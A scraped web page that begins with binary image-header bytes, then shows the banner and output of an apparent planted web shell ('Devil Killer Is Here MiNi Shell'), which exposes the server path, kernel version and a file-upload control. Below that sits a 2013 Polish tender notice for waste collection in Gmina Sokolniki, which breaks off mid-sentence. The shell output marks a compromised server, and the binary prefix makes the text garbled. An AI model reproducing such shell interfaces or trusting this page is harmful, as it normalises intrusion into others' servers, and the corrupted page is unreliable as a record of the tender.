JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130509/182654-N-2013.html

<p class="kh_header"><b>Sokolniki: Wykonanie usługi - odbieranie i zagospodarowanie odpadów komunalnych z terenu Gminy Sokolniki</b><br>
<b>Numer ogłoszenia: 182654 - 2013; data zamieszczenia: 09.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Sokolnikach , ul. Marsz. Józefa Piłsudskiego 1, 98-420 Sokolniki, woj. łódzkie, tel. 062 7845176, faks 062 7845194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sokolniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi - odbieranie i zagospodarowanie odpadów komunalnych z terenu Gminy Sokolniki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia 

Zadanie Nr 1

   1) Przedmiotem tej części zamówienia jest usługa polegająca na odbieraniu i zagospodarowaniu odpadów  komunalnych pochodzących z terenu Gminy Sokolniki z nieruchomości na których zamieszkują mieszkańcy.
Kody CPV:
90500000-2 - Usługi związane z odpadami
90511000-2 - Usługi wywozu odpadów
90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych
90533000-2 - Usługi zagospodarowania odpadów
90512000-9 - Usługi transportu odpadów
90514000-3 - Usługi recyklingu odpadów

2) Informacje ogólne mające wpływ na wycenę zamówienia:
- w ramach zamówienia Wykonawca zobowiązany jest odbierać i zagospodarować odpady ze
   wszystkich nieruchomości zamieszkałych na terenie Gminy Sokolniki.

-  Powierzchnia gminy: 8002 km2

- wykaz dróg przebiegających przez Gminę Sokolniki:

( wykaz dróg gminnych na terenie gminy Sokolniki - załącznik nr 9 do SIWZ, mapa topograficzna gminy - załącznik nr 10 do SIWZ  )
* drogi bitumiczne -  53,865 km
* drogi gruntowe - 42,790 km

Razem: 96,655 km

- załącznikiem nr 11 do SIWZ jest wykaz wszystkich nieruchomości zamieszkałych na terenie
  gminy Sokolniki i liczby zameldowanych w nich osób wg stanu na dzień 23-04-2013 r. 
  Wykaz   załączony jest pomocniczo w celu oszacowania zakresu zamówienia. W okresie realizacji
   zamówienia dane objęte wykazem będą ulegać zmianie. Nie wpłynie to na cenę zamówienia,
   która w okresie realizacji umowy jest niezmienna.

- Szacunkowe ilości odpadów zebranych w 2011 r. i 2012 r. na terenie gminy :

20 03 01 Niesegregowane (zmieszane) odpady komunalne 172,19 (Mg),224,36 (Mg)
                            15 01 06  Zmieszane odpady opakowaniowe  0 (Mg), 4,2 (MG)

                 20 01 358 Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 i 20 01 23 zawierające niebezpieczne składniki (1) 0 (Mg), 8,076(Mg)
20 01 36 Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 i 20 01 35
0 (Mg), 40,224 (Mg), 20 01 34Baterie i akumulatory inne niż wymienione w 20 01 33 0,03(Mg), 0 (Mg)

Wskazane ilości odebranych w 2011 r.i 2012 r. odpadów są podane jedynie pomocniczo w celu ułatwienia Wykonawcom wyceny zamówienia. Zamawiający prognozuje, że po wprowadzeniu na terenie Gminy nowego systemu zbiórki odpadów ilość odbieranych odpadów znacznie wzrośnie.

Ilość umów na wywóz odpadów zawartych przez mieszkańców wg stanu na dzień 31.12.2012 r. wynosiła 785 .

3) W ramach zamówienia Wykonawca zobowiązany jest odbierać i zagospodarować 
    następujące rodzaje odpadów:

  a) z zamieszkałych posesji:
 
- niesegregowane (zmieszane) odpady komunalne o kodzie 20 03 01
- segregowane odpady komunalne z podziałem na następujące frakcje:
* zmieszane odpady opakowaniowe o kodzie 15 01 06 ( papier, metal,tworzywa sztuczne 
  opakowania wielomateriałowe ) 
* opakowania ze szkła o kodzie: 15 01 07

b) z Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK) pozostałe odpady
    komunalne:

- przeterminowane leki o kodzie 20 01 32
- zużyte baterie i akumulatory o kodzie 20 01 34
- zużyty sprzęt elektryczny i elektroniczny o kodach 20 01 23, 20
  01 35, 20 01 36
- odpady wielkogabarytowe o kodzie 20 03 07
- odpady budowlano-rozbiórkowe o kodach z grupy 17
- zużyte opony o kodzie 16 01 03
- odpady ulegające biodegradacji (zielone) o kodzie 20 02 01
- chemikalia o kodzie 20 01 13*, 20 01 14*, 20 01 15*, 20 01 27* i 20 01 29*

c)  przeterminowane leki o kodzie 20 01 32 - wykaz punktów:
     - budynek Urzędu Gminy w Sokolnikach, ul. M.J. Piłsudskiego 1, 98-420 Sokolniki

d) zużyte baterie i akumulatory o kodzie 20 01 34 z następujących punktów:
    - budynek Urzędu Gminy w Sokolnikach, ul. M.J. Piłsudskiego 1, 98-420 Sokolniki
    - Gminny Ośrodek Kultury i Sportu w Sokolnikach, ul. Parkowa 1, 98- 420 Sokolniki
    - Gminny Ośrodek Kultury i Sportu w Sokolnikach, Filia w Starym Ochędzynie, 
      98- 420  Sokolniki
    - Zespół Szkół w Tyblach, Tyble 50 A, 98- 420 Sokolniki
    - Zespoł Szkół w Ochędzynie, Stary Ochędzyn 55, 98- 420 Sokolniki
    - Zespół Szkół w Pichlicach, Pichlice 1, 98- 420 Sokolniki
    - Zespół Szkół w Walichnowach, ul. Szkolna 28A, 98- 420 Sokolniki
    - Zespół Szkół w Sokolnikach, ul. Szkolna 1, 98- 420 Sokolniki

Odpady komunalne odbierane i wywożone będą przez Wykonawcę z częstotliwością zgodną                 z zasadami określonymi w uchwale Rady Gminy Sokolniki w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości                   i zagospodarowania tych odpadów czyli:



- z terenów nieruchomości zamieszkałych :

* niesegregowane (zmieszane) odpady komunalne  - raz w miesiącu;
* papier i tektura, metale, opakowania wielomateriałowe, tworzywa sztuczne -  przynajmniej  raz 
   w miesiącu;
* szkło, w tym szkło bezbarwne oraz szkło kolorowe  - przynajmniej raz na trzy miesiące;
4)  Punkt Selektywnej Zbiórki Odpadów Komunalnych (PSZOK)

-  Zamawiający zorganizuje PSZOK na terenie Międzygminnego Składowiska Odpadów  
    w miejscowości Maręże, gmina Skomlin,

 - Zamawiający zapewnia pracownika do obsługi PSZOK, który monitoruje stan zapełnienia
   pojemników  i niezwłocznie zgłasza konieczność ich opróżnienia Wykonawcy, aby nie dopuścić
   do ich przepełnienia.
- w ramach realizacji zamówienia PSZOK zostanie wyposażony przez Wykonawcę w odpowiednio
  oznakowane pojemniki tak aby zapewnić prawidłową segregację odpadów zgodnie z uchwałą
  Rady Gminy Sokolniki w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania
  odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów                     w  terminie 14 dni od zawarcia umowy, ale nie później niż do dnia 30.06.2013 r. 

- Zamawiający odpowiada za zachowanie na terenie PSZOK i wokół niego czystości i porządku.

- PSZOK będzie odbierał odpady od mieszkańców w następujących terminach:
* w pierwszą i ostatnią sobotę miesiąca czynny od godz. 8 do 14
* w pierwszy i ostatni poniedziałek miesiąca punkt nieczynny
* pozostałe dni punkt czynny w godzinach od 7:30 do 15:30

-  Do PSZOK mieszkańcy mogą oddawać odpady zgodnie z uchwalą Rady Gminy Sokolniki      
   w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od
   właścicieli nieruchomości i zagospodarowania tych odpadów.

5) Obowiązek zapewnienia pojemników

a) Na czas realizacji zamówienia Wykonawca zobowiązany będzie do zapewnienia posiadaczom
    nieruchomości zamieszkałych pojemników na odpady przystosowanych do opróżniania
    mechanicznego. 
Ustala się następujące rodzaje i minimalne pojemności pojemników przeznaczonych do zbierania odpadów komunalnych na terenie nieruchomości zamieszkałej:
1) pojemniki na odpady komunalne  zbierane w sposób zmieszany, o pojemnościach:
	- pojemniki na odpady o pojemności 120 litrów ( 0,12 m3 ) ; 
	- pojemniki na odpady o pojemności 240 litrów  ( 0,24 m3 ); 
	-  pojemniki na odpady o pojemności 1100 litrów  ( 1,1 m3 )  ;
	-  pojemniki (KP5, KP7, KP10) o pojemności od 5 m3 do 10 m3;
2) pojemniki na odpady komunalne zbierane w sposób selektywny:
	- pojemniki na odpady o pojemności 120 litrów ( 0,12 m3 ) ; 
	- pojemniki na odpady o pojemności 240 litrów  ( 0,24 m3 ); 
	- pojemniki na odpady o pojemności 1100 litrów  ( 1,1 m3 )  ;
Orientacyjna liczba pojemników przyporządkowanych do poszczególnych nieruchomości będzie możliwa do ustalenia po złożeniu przez właścicieli nieruchomości deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi.

b) Przekazywane pojemniki powinny być nowe lub używane, czyste i estetyczne.

c) Ilości i objętości pojemników dla nieruchomości winny być dopasowane do ilości osób
    zamieszkałych na niej. Wykaz nieruchomości i i ilości osób je zamieszkujących stanowi
    załącznik nr 11 do SIWZ i będzie na bieżąco aktualizowany przez Zamawiającego.
    Wykonawca w terminie 14 dni od daty przekazania mu aktualizacji wykazu zobowiązany
    będzie do dokonania wymiany pojemników na posesjach lub dostarczenia dodatkowych
    pojemników stosownie do wprowadzonych zmian.

d) Pojemniki będą przez Wykonawcę dostarczane mieszkańcom na posesje w terminie 14 dni od zawarcia umowy, ale nie później niż do dnia 30.06.2013 r. W terminie do 30.06.2013 r. Wykonawca zobowiązany  jest przedłożyć Zamawiającemu raport o ilości i rodzaju pojemników znajdujących się na  poszczególnych nieruchomościach na dzień 30.06.2013 r. wraz z informacją o posesjach, do których pojemników nie dostarczono (z podaniem przyczyny niedostarczenia).

e) Wykonawca wyposaży PSZOK w pojemniki w ilości i o rodzajach wynikających z potrzeb 
    z uwzględnieniem uchwały Rady Gminy Sokolniki  w sprawie sposobu i zakresu świadczenia    usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zagospodarowania tych odpadów stanowiącej załącznik nr 12 do SIWZ.

f) Wykonawca wyposaży punkty, w których odbywać się będzie zbiórka przeterminowanych leków
   oraz punkty, w których odbywać się będzie zbiórka zużytych baterii i akumulatorów 
    w odpowiednie pojemniki z uwzględnieniem potrzeb występujących w danych punktach.

g) Jeżeli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia pojemników z winy
    Wykonawcy, Wykonawca zobowiązany będzie do wymiany uszkodzonego pojemnika na własny
    koszt.

Zadanie Nr 2

1) Przedmiotem tej części zamówienia jest usługa polegająca na odbieraniu i zagospodarowaniu odpadów  komunalnych pochodzących z terenów użyteczności publicznej położonych na
 terenie Gminy Sokolniki.

2) Wykaz lokalizacji terenów uzyteczności publicznej z których należy odebrać odpady wraz 
     z liczbą koszy stanowi załącznik nr 6 do SIWZ.

3) Wskazane w załączniku nr 6 do SIWZ kosze zlokalizowane przy drogach,przystankach autobusowych, na placach, w parkach opróżniane powinny być z częstotliwością zapewniającą niedopuszczenie do ich przepełnienia i wysypywania odpadów na ziemię tj. nie rzadziej niż raz w miesiącu.






II. Częstotliwość, zasady odbioru i wywozu odpadów.

1) Odbiór i wywóz odpadów komunalnych Wykonawca będzie realizował z częstotliwością i na 
     zasadach określonych w uchwale Rady Gminy Sokolniki w sprawie sposobu i zakresu
     świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości 
     i zagospodarowania tych odpadów.

2) Odbiór i wywóz odpadów komunalnych Wykonawca będzie realizował w poszczególnych
     miejscowościach zawsze w ten sam dzień roboczy tygodnia. W sytuacji, gdy dzień wywozu
     jest ustawowo dniem wolnym od pracy (święto), wywóz odpadów nastąpi w pierwszym
    dniu roboczym po dniu wolnym.

3) Zamawiający monitoruje stan zapełnienia  pojemników na przeterminowane lekarstwa i zużyte  baterie oraz akumulatory małogabarytowe. Zamawiający zgłasza telefonicznie konieczność odbioru odpadów z poszczególnych pojemników. Wykonawca zobowiązany będzie odbierać w/w odpady po wcześniejszym zgłoszeniu telefonicznym Zamawiającego z zachowaniem takiej  częstotliwości, aby nie dopuścić do przepełnienia tych pojemników.

4) Wykonawca w ramach zamówienia zobowiązany jest do zrealizowania wywozu odpadów
    wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego bezpośrednio
    z nieruchomości zamieszkałych. Wywóz w/w odpadów w ramach umowy powinien być
    zrealizowany raz  w roku w okresie jesiennym.

a)  Szczegółowy termin zbiórki w poszczególnych miejscowościach oraz zasady zbiórki powinny
     być każdorazowo poprzedzone akcją informacyjną. 

b) Zbiórka polega na :
    - załadunku na środek transportu odpadów wystawionych przed nieruchomość zamieszkałą,
    - zagospodarowaniu odebranych odpadów,
    - posprzątaniu miejsc, z których odbierane są wystawione odpady

c) Zbiórka nie obejmuje odpadów powstałych w trakcie prowadzonej działalności przez podmioty
   gospodarcze.

5) Wykonawca zobowiązany jest do sukcesywnego wywozu odpadów z PSZOK tak aby zapewnić
     możliwość ciągłego dostarczania odpadów przez mieszkańców.

6) Odbiór odpadów będzie następował z pojemników wystawionych przez właściciela 
    nieruchomości na zewnątrz posesji  do drogi dojazdowej lub ustawionych w pergolach
    śmietnikowych, do których zapewniony jest swobodny dojazd.

7) Wykonawcę obowiązuje zabezpieczenie przewożonych odpadów przed wysypaniem w trakcie
     transportu; w przypadku wysypania Wykonawca obowiązany jest do natychmiastowego
     uprzątnięcia odpadów oraz skutków ich wysypania ( zabrudzeń, plam,itd.)

8) Wykonawca zobowiązany jest do opracowania i dostarczenia do wszystkich nieruchomości
     zamieszkałych harmonogram wywozu odpadów:
    - pierwszy harmonogram obejmujący okres od dnia 1 lipca 2013 r,do dnia 31 grudnia 2013 r. 
      powinien zostać dostarczony mieszkańcom w terminie do dnia 30.06.2013 r
   - kolejny harmonogram powinien obejmować kolejny  rok kalendarzowy tj. 2014 rok
   - zadaniem Wykonawcy jest takie sporządzenie harmonogramu zapewniające regularność
     i powtarzalność odbierania, by mieszkańcy mogli w łatwy sposób zaplanować przygotowanie
     odpadów do odebrania,
   - harmonogram powinien być sformułowany w sposób przejrzysty, jasny, pozwalający na szybkie
     zorientowanie się co do konkretnych dat odbierania odpadów,
   - harmonogram co do treści i formy wymaga zatwierdzenia przez Zamawiającego

9) Podczas realizacji umowy niedopuszczalne jest mieszanie selektywnie zebranych odpadów
     komunalnych z odpadami niesegregowanymi przez Wykonawcę.

10) W przypadku, gdy odpady nie są gromadzone w pojemnikach odpowiadających wymaganiom
      określonym w Regulaminie utrzymania czystości i porządku na terenie gminy Sokolniki,
      Wykonawca obowiązany jest do ich odebrania oraz poinformowania Zamawiającego
      o nieruchomości, na której odpady nie są gromadzone w sposób odpowiadający wymaganiom
      Regulaminu.

11) W zakresie odbioru odpadów z nieruchomości o utrudnionym dojeździe (brak
      utwardzonej drogi) Wykonawca może ustalić odrębne terminy wywozu niż dla pozostałych
      nieruchomości w danej miejscowości,po uprzednim uzgodnieniu z Zamawiającym.
      W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamknięcie drogi) gdy nie jest
      możliwa realizacja usługi zgodnie z harmonogramem, sposób i termin odbioru odpadów będzie
      każdorazowo uzgadniany pomiędzy Zamawiającym a Wykonawcą i może polegać 
      w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli
      nieruchomości oraz innych terminów ich odbioru - taki sposób spełnienia świadczenia
      wynikającego z umowy może być wykonywany jedynie po uzyskaniu wcześniejszej akceptacji
      Zamawiającego.

III. Kontrola obowiązku segregowania odpadów.
 1) Wykonawca zobowiązany jest do monitorowania ciążącego na właścicielu nieruchomości 
     obowiązku segregowania odpadów komunalnych.
 2) W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku
     segregacji odpadów, wykonawca odbiera odpady jako zmieszane.
 3) W takim przypadku Wykonawca:
     -  umieszcza na pokrywie pojemnika znacznik (np. samoprzylepna kartka) informujący  
        właściciela nieruchomości o otrzymaniu ostrzeżenia za nie przestrzeganie obowiązku
        segregowania odpadów
     - o zaistniałej sytuacji Wykonawca zawiadamia Zamawiającego drogą elektroniczną, faxem lub
        pisemnie, w terminie do 3 dni roboczych,
    -  do zawiadomienia Wykonawca dołącza protokół określający: dzień wywozu, miejscowość,
       ulicę  i numer posesji oraz krótki opis obrazujący podstawę udzielenia ostrzeżenia
       właścicielowi nieruchomości,
     - do protokołu Wykonawca zobowiązany jest dołączyć również dokumentację fotograficzną
       dowodzącą, że odpady gromadzone są w sposób niewłaściwy, zdjęcia muszą zostać wykonane
       w taki sposób, aby nie budząc wątpliwości pozwalały na przypisanie pojemników do 
       konkretnej nieruchomości

4) Zamawiający zastrzega sobie prawo do udziału w wybiórczej kontroli właścicieli nieruchomości
     w przedmiotowym zakresie.

IV. Zagospodarowanie odpadów

1) Wykonawca podczas realizacji przedmiotu umowy zobowiązany jest do osiągnięcia na obszarze
    gminy Sokolniki objętej przedmiotem zamówienia poziomu recyklingu, przygotowania do
    ponownego użycia i odzysku frakcji odpadów obejmujących: papier, metale, tworzywa sztuczne 
    i szkło wyliczonych zgodnie z Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. 
    w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi
    metodami niektórych frakcji odpadów komunalnych ( Dz.U z 2012r . poz. 645 ).

2) Wymagane poziomy recyklingu, przygotowania do ponownego użycia i odzysku wskazanych  
     w pkt. 1 frakcji odpadów wynoszą :
     - w roku 2013 - co najmniej 12 % ,
     -  w roku 2014 - co najmniej 14 % .

3) Wykonawca zobowiązany jest do osiągnięcia na obszarze gminy Sokolniki objętej przedmiotem
    zamówienia poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi
    metodami niż niebezpieczne odpadów budowlanych i rozbiórkowych wyliczonych zgodnie 
    z Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012r. w sprawie poziomów recyklingu,
    przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów
    komunalnych ( Dz. U z 2012 r. Poz. 645 ).

4) Wymagane poziomy recyklingu, przygotowania do ponownego użycia i odzysku innymi
     metodami wskazanych w pkt. 3 innych niż niebezpieczne odpadów budowlanych 
     i rozbiórkowych wynoszą :
     -  w roku 2013 - co najmniej 36%,
     -  w roku 2014 - co najmniej 38%.

5) Wykonawca jest zobowiązany do osiągnięcia na obszarze Gminy Sokolniki poziomu
    ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do
    składowania w stosunku do masy tych odpadów wytworzonych w 1995r., wyliczonych zgodnie 
    z Rozporządzeniem Ministra Środowiska z dnia 25 maja 2012r., w sprawie poziomów
    ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do
    składowania oraz sposobu obliczenia poziomów ograniczenia tych odpadów ( Dz.U. z 2012 r.,
    poz. 676 ).

6) Wymagane poziomy, o których mowa w pkt. 5, wynoszą:
    - od 1 lipca do 15 lipca 2013r. - co najwyżej 75 %,
    - od 16 lipca 2013r. Do 31 grudnia 2013r. - co najwyżej 50 %,
    - w roku 2014r. - co najwyżej 50 %.

7) Weryfikacja osiąganych przez Wykonawcę poziomów recyklingu wykonywana będzie przez 
    Zamawiającego na podstawie kwartalnych sprawozdań przekazywanych przez Wykonawcę
    spełniających wymogi Rozporządzenia Ministra Środowiska z dnia 15 maja 2012 r. w sprawie
    wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych
   oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi ( Dz.U z 2012 poz. 630)

8) Wykonawca zobowiązany jest do przekazywania odebranych zmieszanych odpadów
     komunalnych, odpadów zielonych oraz pozostałości z sortowania zmieszanych odpadów   
     komunalnych przeznaczonych do składowania do  Regionalnej Instalacji do Przetwarzania
    Odpadów Komunalnych  właściwej dla regionu II lub w szczególnych przypadkach dla instalacji
    przewidzianej do zastępczej obsługi regionu zgodnie z uchwałą Nr XXVI/481/12 Sejmiku
    Województwa Łódzkiego z dnia 21 czerwca 2012r. w sprawie przyjęcia Planu Gospodarki
    Odpadami Województwa Łódzkiego 2012 oraz uchwałą nr XXVI/482/12 Sejmiku Województwa
    Łódzkiego z dnia 21 czerwca 2012r. W sprawie wykonania Planu gospodarki odpadami
    województwa łódzkiego 2012.



9) Przekazywanie selektywne zebranych odpadów komunalnych do instalacji odzysku 
     i unieszkodliwiania zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 - 19
     ustawy z dnia  14 grudnia 2012 r.o odpadach.

V.  Raporty i inne obowiązki informacyjne

1) Wykonawca zobowiązany będzie do prowadzenia i przekazania Zamawiającemu dokumentacji
     związanej z przedmiotem zamówienia :
   a) Raportu na koniec II kwartału 2013 r. o ilości i rodzaju pojemników znajdujących się na
       poszczególnych nieruchomościach.
  b) Raportów miesięcznych zawierających określenie :
       - ilości i rodzajów przekazywanych pojemników w danym miesiącu wraz z uaktualnionym
         raportem o ilości i rodzaju pojemników znajdujących się na poszczególnych 
         nieruchomościach,
      - ilości odebranych odpadów zmieszanych (Mg)
      - ilości odebranych odpadów szkła (Mg)
      - ilości selektywnie odebranych odpadów z podziałem na: papier, metal, tworzywa
        sztuczne oraz opakowania wielomateriałowe (Mg),
     -  ilości odebranych odpadów wielkogabarytowych, zużytego sprzętu elektrycznego
        i elektronicznego oraz zużytych opon (Mg),
     - ilości odebranych przeterminowanych leków, zużytych baterii i akumulatorów oraz
       chemikaliów ( Mg)
     - ilości odebranych odpadów biodegradowalnych / zielonych / ( Mg )
    - adresach nieruchomości od których zostały odebrane odpady komunalne 
     - sposobach zagospodarowania w/w odpadów
     - ilości i rodzaju wydzielonych odpadów surowcowych ( papier, metal, tworzywa sztuczne
       opakowania wielomateriałowe, szkło ), ze strumienia odpadów zmieszanych ( Mg)

Raporty o których mowa muszą być przekazane w formie elektronicznej uzgodnionej                                z Zamawiającym. Wykonawca przesyła raport do Zamawiającego w terminie do 7 dni od zakończenia miesiąca, którego dotyczy.
Raport za miesiąc grudzień 2014 r. zostanie przez Wykonawcę przekazany w terminie do dnia 
31 stycznia 2015 r.
Zaakceptowany przez Zamawiającego Raport miesięczny jest podstawą do wystawienia faktury za wykonaną usługę.

2) Bieżące przekazywanie adresów nieruchomości na których zamieszkują mieszkańcy i powstały
    odpady komunalne, a nie ujętych w bazie danych prowadzonej przez Zamawiającego.

3) Sprawozdań, o których mowa w art. 9n ustawy o utrzymaniu czystości i porządku w gminach.

4) Jako załączniki do faktury miesięcznej Wykonawca załączy karty przekazania odpadów  
    uwzględniające datę, kod, rodzaj, wagę przekazanych odpadów komunalnych do RIPOK.
    Karty przekazania odpadów, o których mowa w zdaniu poprzednim muszą jednoznacznie
    stwierdzać, że odpady pochodzą z terenu gminy Sokolniki oraz sporządzone zgodnie 
    z Rozporządzeniem Ministra Środowiska z dnia 08 grudnia 2010r. w sprawie wzorów
    stosowanych na potrzeby ewidencji odpadów.





VI. Pozostałe obowiązki Wykonawcy:

1. Do obowiązków Wykonawcy w szczególności należy:
 a) wykonanie przedmiotu umowy w sposób sprawny, ograniczający do minimum utrudnienia  
     w ruchu drogowym, korzystaniu z nieruchomości oraz niedogodności dla mieszkańców gminy
    Sokolniki,
b) zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania umowy
   dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonanie
   zakresu rzeczowego usługi, jak również odpowiedniego personelu,
c) dokonywanie odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do punktów
